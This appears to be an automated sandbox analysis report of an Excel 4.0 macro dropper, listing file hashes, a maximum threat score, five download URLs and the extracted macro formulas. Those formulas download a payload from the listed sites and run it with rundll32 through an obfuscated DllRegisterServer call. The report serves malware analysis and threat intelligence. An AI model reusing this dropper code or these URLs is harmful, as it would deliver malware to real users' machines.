General

  • Target

    e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c

  • Size

    103KB

  • Sample

    241120-xhsg6a1cmd

  • MD5

    8bc1de4dc82cc239ed5d1909262bbec1

  • SHA1

    1a0b7d2a7dd047879b95d202e144a18ee1cf2f8f

  • SHA256

    e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c

  • SHA512

    3614dab408e1d9fd701278738a5159a2ed940e4cdb7dc75d944b7f222c546499994299442080e4a02880663e3c5c35960b6999d1f0def8edb426e90ba01076e2

  • SSDEEP

    3072:V7vjgqu8hahYIfiQOVOveshVf4KwJQikmGo2:V7vjgrbtO8eOaDPk1o2

Score
10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    http://lupus.ktcatl.com/wp-content/uCccWJ/

    https://packersandmoversbangalorecharges.com/cgi-bin/UrI6GM87K5u2y2pOW/

    http://123breathe.org/error/Drs/

    https://greenesqualityflooring.com/error/kUO7NnkpMp2cs/

    http://new.hssus.org/wp-includes/blocks/eKID0QAfLUS/

Attributes
  • formulas

    =TODO
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://lupus.ktcatl.com/wp-content/uCccWJ/","..\iix.ocx",0,0)
    =IF('TTGEHEHEHFHDG'!C15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://packersandmoversbangalorecharges.com/cgi-bin/UrI6GM87K5u2y2pOW/","..\iix.ocx",0,0))
    =IF('TTGEHEHEHFHDG'!C17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://123breathe.org/error/Drs/","..\iix.ocx",0,0))
    =IF('TTGEHEHEHFHDG'!C19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://greenesqualityflooring.com/error/kUO7NnkpMp2cs/","..\iix.ocx",0,0))
    =IF('TTGEHEHEHFHDG'!C21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://new.hssus.org/wp-includes/blocks/eKID0QAfLUS/","..\iix.ocx",0,0))
    =IF('TTGEHEHEHFHDG'!C23<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    http://lupus.ktcatl.com/wp-content/uCccWJ/

Targets

    • Target

      e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c

    • Size

      103KB

    • MD5

      8bc1de4dc82cc239ed5d1909262bbec1

    • SHA1

      1a0b7d2a7dd047879b95d202e144a18ee1cf2f8f

    • SHA256

      e5840a5dd007f5046bdb8ccfea92d04cbaadaa58c1d03e872b23e697b72dd70c

    • SHA512

      3614dab408e1d9fd701278738a5159a2ed940e4cdb7dc75d944b7f222c546499994299442080e4a02880663e3c5c35960b6999d1f0def8edb426e90ba01076e2

    • SSDEEP

      3072:V7vjgqu8hahYIfiQOVOveshVf4KwJQikmGo2:V7vjgrbtO8eOaDPk1o2

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15
